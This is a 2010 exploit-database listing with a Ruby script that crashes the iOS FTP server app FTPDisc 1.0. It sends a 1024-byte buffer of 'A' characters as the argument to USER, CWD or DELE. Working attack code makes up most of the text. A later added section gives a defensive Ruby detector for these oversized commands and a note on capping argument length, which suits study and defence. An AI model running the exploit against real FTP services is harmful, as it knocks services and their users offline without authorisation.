
Topic: iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS

ExploitAlert: 7865
Credit: Alberto Ortega
Date: 01.03.2010


Exploit Code:

###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite
# http://itunes.apple.com/es/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P
#
# Exploit language -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
  puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS"
  puts ""
  puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
  puts ""
  puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
  puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
  puts ""
else
  # "A" doubled 10 times gives a 1024-byte argument.
  buffer = "A"
  10.times do
    buffer = "#{buffer}#{buffer}" # Here the big buffer to send
  end
  if expl == "1" # EXPLOIT 1
    begin
      socket = TCPSocket.new(host, 21)
      puts "[*] Exploiting ..."
      socket.write("USER #{buffer}\r\n")
      puts "[*] Succesfully exploited! :)"
    rescue
      puts "Connection problem"
    end
  elsif expl == "2" || expl == "3"
    begin
      print "[*] Connecting to FTP ... "
      ftp = Net::FTP.new(host, "anonymous")
      puts "OK"
      puts "[*] Exploiting ..."
      if expl == "2"
        begin
          ftp.chdir(buffer) # EXPLOIT 2
        rescue
        end
      else
        begin
          ftp.delete(buffer) # EXPLOIT 3
        rescue
        end
      end
      puts "[*] Succesfully exploited! :)"
    rescue
      puts "Connection problem"
    end
  else
    puts "Incorrect exploit selection (1, 2, 3)"
  end
end
puts ""
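
Detection sketch for the three triggers above (an added example, not part of Alberto Ortega's code): it flags FTP control-channel lines where USER, CWD or DELE carries an oversized argument, such as the 1024-byte run of "A" the script sends. The 255-byte cap, the function names and the sample lines are assumptions made for this illustration.

```ruby
# Added example: flag FTP client commands that match the pattern in the PoC,
# i.e. USER, CWD ("cd") or DELE ("delete") followed by an oversized argument.

# Assumption: 255 bytes is a generous cap for a user name or path argument;
# tune it to the FTP server being protected.
MAX_ARG_BYTES = 255
WATCHED = %w[USER CWD DELE].freeze

Finding = Struct.new(:line_no, :verb, :arg_bytes, :filler)

# Returns a Finding when a watched command exceeds the cap, otherwise nil.
def inspect_ftp_line(raw, line_no)
  line = raw.b.chomp                 # work on bytes, drop the trailing CRLF
  verb, arg = line.split(" ", 2)
  return nil if verb.nil? || arg.nil?
  verb = verb.upcase                 # FTP verbs are case-insensitive
  return nil unless WATCHED.include?(verb) && arg.bytesize > MAX_ARG_BYTES
  # One byte value repeated for the whole argument is typical fuzzer filler.
  filler = arg.bytes.uniq.size == 1
  Finding.new(line_no, verb, arg.bytesize, filler)
end

# Scans an ordered list of control-channel lines, numbering them from 1.
def scan_ftp_commands(lines)
  lines.each_with_index.map { |l, i| inspect_ftp_line(l, i + 1) }.compact
end

# Constructed sample of client commands (not captured traffic).
SAMPLE = [
  "USER anonymous\r\n",
  "CWD /Documents\r\n",
  "USER #{'A' * 1024}\r\n",
  "DELE #{'A' * 1024}\r\n",
  "STOR #{'B' * 1024}\r\n", # long, but not one of the three commands in the PoC
  "cwd #{'x' * 300}y\r\n"
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_ftp_commands(SAMPLE).each do |f|
    note = f.filler ? " (single repeated byte)" : ""
    puts "line #{f.line_no}: #{f.verb} argument of #{f.arg_bytes} bytes#{note}"
  end
end
```

The same length cap, enforced in the server's command parser before the argument is copied anywhere, is the corresponding fix on the application side.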



